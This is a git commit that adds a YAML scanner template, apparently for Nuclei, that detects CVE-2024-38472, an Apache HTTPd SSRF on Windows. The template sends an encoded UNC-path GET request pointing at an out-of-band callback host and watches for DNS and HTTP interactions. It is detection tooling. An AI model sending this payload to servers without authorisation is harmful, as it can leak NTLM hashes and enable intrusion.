Added template for CVE-2024-38472

1970-01-01 00:00:00 +00:00 · 1970-01-01 00:00:00 +00:00 · 85fd47adf7
parent eda4d6af18
commit 85fd47adf7
1 changed files with 37 additions and 0 deletions
--- a/CVE-2024-38472.yaml
+++ b/CVE-2024-38472.yaml
@ -0,0 +1,37 @@
+id: CVE-2024-38472
+
+info:
+  name: CVE-2024-38472 - Apache HTTPd Windows UNC SSRF
+  author: pdteam
+  severity: high
+  description: |
+    SSRF in Apache HTTP Server on Windows allows to potentially leak NTML hashes to a malicious server via SSRF and malicious requests or content 
+    Users are recommended to upgrade to version 2.4.60 which fixes this issue.  Note- Existing configurations that access UNC paths will have to configure new directive "UNCList" to allow access during request processing.
+  reference:
+    - https://blog.orange.tw/2024/08/confusion-attacks-en.html
+    - https://httpd.apache.org/security/vulnerabilities_24.html
+    - https://security.netapp.com/advisory/ntap-20240712-0001/
+    - https://github.com/fkie-cad/nvd-json-data-feeds
+    - https://github.com/nomi-sec/PoC-in-GitHub
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2024-38472
+    cwe-id: CWE-918
+    epss-score: 0.00043
+    epss-percentile: 0.09569
+
+http:
+  - path:
+      - "{{BaseURL}}/%5C%5C{{interactsh-url}}/apachehttpd"
+    method: GET
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+      - type: word
+        part: interactsh_request
+        words:
+          - "/apachehttpd"
+    matchers-condition: and